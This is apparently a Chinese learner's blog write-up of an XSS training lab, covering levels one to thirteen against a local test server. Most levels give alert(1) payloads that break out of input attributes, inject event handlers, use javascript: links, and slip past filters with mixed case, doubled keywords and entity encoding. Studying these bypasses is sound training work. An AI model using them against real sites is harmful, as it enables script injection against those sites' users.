XSS挑战赛实战演练

一.文本解析为HTML

观察到name的参数为注入点,且网站并未对用户输入进行过滤

二.Input标签value注入

当语句放入value属性中,默认不执行,想办法进行闭合,对input标签进行闭合

<input name=keyword value="<script>alert(1)</script>">

<input name=keyword value=""><script>alert(1)</script>"> 最后多余的">被兼容

三.htmlspecialchars()的缺陷

源代码显示<input name=keyword value='&lt;script&gt;alert(1)&lt;/script&gt;'>

源代码中使用htmlspecialchars函数,对特殊符号进行转义,但单引号'没有被转义,考虑事件注入

四.没有过滤双引号

观察到源代码对<>直接进行了过滤,没有使用函数,所以闭合掉",注入事件

<input name=keyword value="" onclick="alert(1)">

五.href的危险

观察到无论如何<script>始终替换为<scr_ipt>,考虑使用javascript伪协议

<input name=keyword value=""> <a href=javascript:alert(1)>">

六.字符过滤

观察到源代码对很多敏感单词进行替换,但绕过绕的不是浏览器,是过滤器,浏览器对html标签和属性大小写不区分,但过滤器可能没对大小写进行统一

<input name=keyword value=""> <a hr_ef=javascript:alert(1)>">

七.字符串替换,但只替换一次

<input name=keyword value="<>alert(1)</>">

对script等进行过滤,但只过滤一次,可以考虑双写

"> <scscriptript>alert(1)</sscriptcript>

八.URL中的实体

使用unicode编码

实体编码链接:https://www.qqxiuzi.cn/bianma/zifushiti.php

九.对href进行检测

源代码中对href格式进行检测,需要包含http://形式,为不影响注入,加入//进行注释并放在末端

<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;//http://">友情链接</a>

十.隐藏表单字段注入

127.0.0.1:90/level10.php?keyword=1&t_link=1&t_history=2&t_sort=3

将值代入发现t_sort的值会被带入,对此参数进行事件注入

<input name="t_sort" value=""onclick="alert(1)" type=text" type="hidden">

十一.referer注入

跳回到未注入前的初状态

burpsuite监听器端口不需要和本地网站端口一样

burpsuite对一般网站可以抓包,面对本地回环网站时无法抓包?

浏览器/系统对本地回环地址的特殊规则:直接绕过代理:默认认为访问本机服务不需要代理

可以修改为127.0.0.1.nip.io:端口号,浏览器当作普通域名走代理

十二.同上
十三.Cookie注入

利用隐藏参数寻找注入点,后续操作同上

累了,后面几关学了再更

相关推荐
tedcloud12317 分钟前
taste-skill部署教程:打造个性化AI推荐工作流
服务器·前端·人工智能·系统架构·edge
xinhuanjieyi31 分钟前
html修复游戏种太阳错误
前端·游戏·html
其实防守也摸鱼1 小时前
软件安全与漏洞--软件安全编码与防御技术理论题库
开发语言·网络·安全·网络安全·软件安全·软件安全与漏洞
林希_Rachel_傻希希1 小时前
学React治好了我的焦虑症,1小时速通React 前20分钟。
前端·javascript·面试
Cache技术分享1 小时前
435. Java 日期时间 API - Clock 灵活获取当前时间
前端·后端
独泪了无痕2 小时前
Vue3中防御XSS攻击的“特效药”-DOMPurify
前端·vue.js·安全
小小19923 小时前
idea 配置less转化为css
前端·css·less
hhb_6183 小时前
Less嵌套避坑:优先级冲突实战解析
前端·css·less
云水一下3 小时前
Vue.js从零到精通系列(五):全局状态管理——Pinia 核心与实践
前端·javascript·vue.js
我不是外星人3 小时前
浅谈我对 AI 发展的看法
前端·ai编程·claude